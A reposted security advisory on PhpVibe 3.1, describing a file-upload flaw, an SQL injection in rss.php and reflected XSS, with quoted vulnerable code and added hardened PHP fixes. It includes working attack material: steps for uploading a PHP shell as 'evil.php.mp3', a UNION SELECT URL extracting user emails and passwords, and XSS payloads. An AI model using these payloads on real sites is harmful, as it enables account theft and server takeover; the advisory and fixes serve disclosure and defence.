
PhpVibe 3.1 Multiple Vulnerabilities and Fixes - Website Security - 自学php

Source: 自学PHP网    Date: 2015-04-17 10:15


##################################################################
#Title: PhpVibe 3.1 - Multiple Vulnerabilities
#Vendor: PhpVibe
#Website: http://phprevolution.com/
#Risk level: High
#Discovered by: Esac
#################################################################
 
 
+------------+
| Background |
+------------+
 
PhpVibe is a Premium video sharing cms with or without upload. Supports all main video sharing websites like Youtube, Vimeo, Dailymotion, Metacafe… and flv, mp4, mp3 uploads. No ffmpeg required. Upload option can be turned off.
 
+-----------------------------------------------------------------------------------+
 
 
+------------------------------+
| Remote Arbitrary File Upload |
+------------------------------+
 
 Vulnerable file: upload.php
 
 
...............................................
 
 
    // upload.php (PhpVibe 3.1) as quoted in the advisory. Three weaknesses are visible:
    // (1) only the text after the LAST dot is compared with the allow-list, so "evil.php.mp3" passes as "mp3";
    // (2) the client-supplied filename is reused verbatim in the target path;
    // (3) empty($allowedExts) / empty($maxFileSize) make an unset setting fail open.
    if ($_FILES['file']['name'] != '') {
        $fileName = $_FILES['file']['name'];
        $fileSize = $_FILES['file']['size'];
        $ext = substr($fileName, strrpos($fileName, '.') + 1);
        if (in_array($ext, $allowedExts) or empty($allowedExts)) {
            if ($fileSize < $maxFileSize or empty($maxFileSize)) {
                $target_path = $target_path . basename($_FILES['file']['name']);
                if (move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {
                    echo '{"success":true, "file": "'.$target_path.'"}';
                    vinsert(basename($_FILES['file']['name']), basename($_FILES['file']['name']));
                } else {
                    echo '{"success":false, "details": "move_uploaded_file failed"}';
                }
            } else {
                echo '{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}';
            }
        } else {
            echo '{"success":false, "details": "File type '.$ext.' not allowed."}';
        }
    } else {
        echo '{"success":false, "details": "No file received."}';
    }
 
 
Real exploitation:
 
To exploit this vulnerability you must be a registered user; go to the video upload area:
 
http://server/upload
 
Upload the file as evil.php.mp3, file.php.mp4 or file.php.flv
 
Shell access :
 
http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3
 
Demo : 
 
server/media/flv/august-23-13-5-10-pm-evil.php.flv
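The handler above trusts the client-supplied name twice: once for the extension check (only the part after the last dot) and once for the path it writes to. The following is an added example, not PhpVibe's code, showing how the same upload endpoint can be hardened: the file is accepted only if its final extension is on the allow-list and its content matches that type, and it is then stored under a server-generated name in a directory outside the web root. The configuration values, the storage path and the extension-to-MIME table are assumptions for illustration.

```php
<?php
// Added example (not PhpVibe's code): hardened replacement for the upload handler.
// Assumes $allowedExts, $maxFileSize and a storage directory outside the web root.
declare(strict_types=1);

function store_upload(array $file, array $allowedExts, int $maxFileSize, string $storageDir): array
{
    // 1. Accept only a file that actually arrived through a successful HTTP upload.
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return ['success' => false, 'details' => 'No file received.'];
    }

    // 2. An empty allow-list or missing size limit is a configuration error, not "allow everything".
    if ($allowedExts === [] || $maxFileSize <= 0) {
        return ['success' => false, 'details' => 'Upload not configured.'];
    }
    if ($file['size'] > $maxFileSize) {
        return ['success' => false, 'details' => 'Maximum file size exceeded.'];
    }

    // 3. Compare the final extension with the allow-list; the client name is used for nothing else.
    //    "evil.php.mp3" still yields "mp3" here, which is why step 5 discards the original name.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, array_map('strtolower', $allowedExts), true)) {
        return ['success' => false, 'details' => "File type $ext not allowed."];
    }

    // 4. Check the content type from the bytes, not from the name or the client's header.
    //    The MIME table is an assumption; adjust it to what libmagic reports on the deployment.
    $expected = ['mp4' => ['video/mp4'], 'flv' => ['video/x-flv'], 'mp3' => ['audio/mpeg']];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($expected[$ext]) || !in_array($mime, $expected[$ext], true)) {
        return ['success' => false, 'details' => 'File content does not match its extension.'];
    }

    // 5. Server-generated name: random, exactly one extension, no user input in the path.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;
    $target  = rtrim($storageDir, '/') . '/' . $newName;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return ['success' => false, 'details' => 'move_uploaded_file failed'];
    }
    // Stored media must never be executable; serve it through a download script or a
    // location with PHP execution disabled rather than exposing $target directly.
    chmod($target, 0640);

    return ['success' => true, 'file' => $newName];
}

// Usage (hypothetical configuration values).
$allowedExts = ['mp4', 'flv', 'mp3'];
$maxFileSize = 50 * 1024 * 1024;
$storageDir  = '/var/www/phpvibe-storage';   // assumed path, outside the document root
if (isset($_FILES['file'])) {
    header('Content-Type: application/json');
    echo json_encode(store_upload($_FILES['file'], $allowedExts, $maxFileSize, $storageDir));
}
```

Renaming is the decisive change: even if an attacker-chosen multi-extension name passes the check, nothing of that name reaches the filesystem, so the web server never sees a ".php" segment. The MIME check and the out-of-webroot storage are defence in depth for the case where the allow-list is later widened.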
 
 
+-----------------------------------------------------------------------------------+
 
 
+---------------+
| SQL Injection |
+---------------+
  
PhpVibe is possibly vulnerable to SQL injection attacks. Affected file: rss.php, parameter: cat
 
affected code :
 
//rss.php , line 24

// The entity names below are reconstructed: the scraped copy had them HTML-decoded,
// which left an unterminated string. clean_feed() only escapes XML metacharacters in
// the feed output; it is not applied to the SQL query further down.
function clean_feed($input)
{
    $original = array("<", ">", "&", '"', "'", "<br/>", "<br>");
    $replaced = array("&lt;", "&gt;", "&amp;", "&quot;", "&#39;", "", "");
    $newinput = str_replace($original, $replaced, $input);

    return $newinput;
}


echo '<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
';
echo '
<title>'.$seo_title.'</title>
<description>'.$seo_desc.'</description>
<link>'.$site_url.'</link>
';
// The "cat" query parameter is concatenated straight into the SQL string.
if ($cat = MK_Request::getQuery('cat')) {
    $vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30");
} else {
    $vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30");
}
while ($videosData = mysql_fetch_array($vbox_result))
{
    $url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']).'/';
    $rss_datetime = $videosData["date"];
    echo '
    <item>
<title>'.strip_tags($videosData['title']).'</title>
<link><![CDATA['.$url.']]></link>
<guid><![CDATA['.$url.']]></guid>
<pubDate>'.$rss_datetime.'</pubDate>
<description><![CDATA['.clean_feed($videosData["description"]).' ]]></description>
</item>

     ';

}

// The advisory's excerpt ends here; the string is closed with the matching </rss> tag.
echo '</channel>
</rss>';
 
 
 
PoC:
 
http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--
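The fix for the injection is to stop building the query from strings. The following is an added example, not PhpVibe's code, that rewrites the rss.php category lookup with a PDO prepared statement and renders the feed with proper XML escaping instead of the hand-rolled clean_feed(). The PDO connection, the DSN and the assumption that category is a string column are mine; the table and column names come from the query shown above.

```php
<?php
// Added example (not PhpVibe's code): rss.php category query with a bound parameter.
// Assumes a PDO connection $pdo and the videos table used in the original query.
declare(strict_types=1);

function fetch_feed_videos(PDO $pdo, ?string $cat): array
{
    if ($cat !== null && $cat !== '') {
        // The user value travels as a bound parameter, never as SQL text, so a value
        // such as "-1 union select ..." is just a category name that matches nothing.
        $stmt = $pdo->prepare(
            'SELECT id, title, description, date FROM videos WHERE category = :cat ORDER BY id DESC LIMIT 30'
        );
        $stmt->bindValue(':cat', $cat, PDO::PARAM_STR);
    } else {
        $stmt = $pdo->prepare(
            'SELECT id, title, description, date FROM videos WHERE views > 0 ORDER BY id DESC LIMIT 30'
        );
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// XML text node escaping: the XML-significant characters become entities.
function xml_text(string $s): string
{
    return htmlspecialchars($s, ENT_XML1 | ENT_QUOTES, 'UTF-8');
}

function render_feed(array $videos, string $siteUrl, string $title, string $desc): string
{
    $out  = '<?xml version="1.0" encoding="utf-8"?>' . "\n<rss version=\"2.0\">\n<channel>\n";
    $out .= '<title>' . xml_text($title) . "</title>\n";
    $out .= '<description>' . xml_text($desc) . "</description>\n";
    $out .= '<link>' . xml_text($siteUrl) . "</link>\n";
    foreach ($videos as $v) {
        // The id is cast so the URL can only ever contain an integer.
        $url  = $siteUrl . 'video/' . (int)$v['id'] . '/';
        $out .= "<item>\n"
              . '<title>' . xml_text(strip_tags((string)$v['title'])) . "</title>\n"
              . '<link>' . xml_text($url) . "</link>\n"
              . '<guid>' . xml_text($url) . "</guid>\n"
              . '<pubDate>' . xml_text((string)$v['date']) . "</pubDate>\n"
              . '<description>' . xml_text(strip_tags((string)$v['description'])) . "</description>\n"
              . "</item>\n";
    }
    return $out . "</channel>\n</rss>\n";
}

// Usage (hypothetical DSN and credentials). Emulated prepares are disabled so that
// MySQL itself binds the parameter instead of the driver interpolating it client-side.
// $pdo = new PDO('mysql:host=localhost;dbname=phpvibe;charset=utf8mb4', 'user', 'pass', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,
// ]);
// header('Content-Type: application/rss+xml; charset=utf-8');
// echo render_feed(fetch_feed_videos($pdo, $_GET['cat'] ?? null), $site_url, $seo_title, $seo_desc);
```

Two things change relative to the original: the query text is fixed at compile time regardless of what cat contains, and the feed body is escaped with the XML-aware flag set rather than a partial replace list, so a description containing `]]>` or a bare `&` can no longer break the document.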
 
 
+--------------------------------------------------------------------------------------+
 
+------------+
| XSS Attack |
+------------+
 
Multiple XSS vulnerabilities have been detected in phpVibe 3.1.
 
1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
 
Example:
http://server/show/'">><marquee><h1>XSS</h1></marquee>
 
 
 
2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 3.1. Other versions may also be affected.
 
Example:
 
http://server/forgot-pass.php   => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/login.php         => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/register.php      => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
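All three reflections have the same root cause: a value taken from the request is written back into an HTML attribute without encoding. The following is an added example, not PhpVibe's code, showing the two controls that close it: validate the email before it is ever reflected, and encode whatever is reflected for the HTML context it lands in. The form markup is a hypothetical reconstruction of a login form, not the application's template, and the self-check at the end reuses the advisory's own payload as a constructed input.

```php
<?php
// Added example (not PhpVibe's code): context-correct output encoding for the
// reflected "email" value on login.php, register.php and forgot-pass.php.
declare(strict_types=1);

// Encode for an HTML attribute value or element body. ENT_QUOTES covers both ' and "
// (the advisory's payload starts with '"> to close a quoted attribute); ENT_SUBSTITUTE
// keeps invalid UTF-8 from silently turning the whole output into an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Validation comes first: anything that is not an address is never reflected at all.
function valid_email(?string $value): bool
{
    return $value !== null && filter_var($value, FILTER_VALIDATE_EMAIL) !== false;
}

function render_login_form(?string $email): string
{
    // Only a validated value is echoed back, and even that value is encoded.
    $prefill = valid_email($email) ? h($email) : '';
    return '<form method="post" action="/login.php">'
         . '<input type="email" name="email" value="' . $prefill . '">'
         . '<input type="password" name="password">'
         . '<button type="submit">Login</button></form>';
}

// Self-check with the advisory's payload as constructed input.
$payload = '\'">><marquee><h1>XSS</h1></marquee>';
if (render_login_form($payload) !== render_login_form(null)) {
    throw new RuntimeException('invalid address was reflected');
}
$encoded = h($payload);
if (strpbrk($encoded, '<>"\'') !== false) {
    throw new RuntimeException('encoding left a markup character in place');
}

// Usage: on the real pages, reflect only through render_login_form()-style helpers.
// header("Content-Security-Policy: default-src 'self'");   // defence in depth, not a substitute
// echo render_login_form($_POST['email'] ?? null);
```

The encoding function is deliberately one fixed call rather than a configurable "clean" routine: the bug class here is a missing encode at the output site, and a helper with one correct flag set is easier to audit than a replace list like the clean_feed() in rss.php.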
 

 
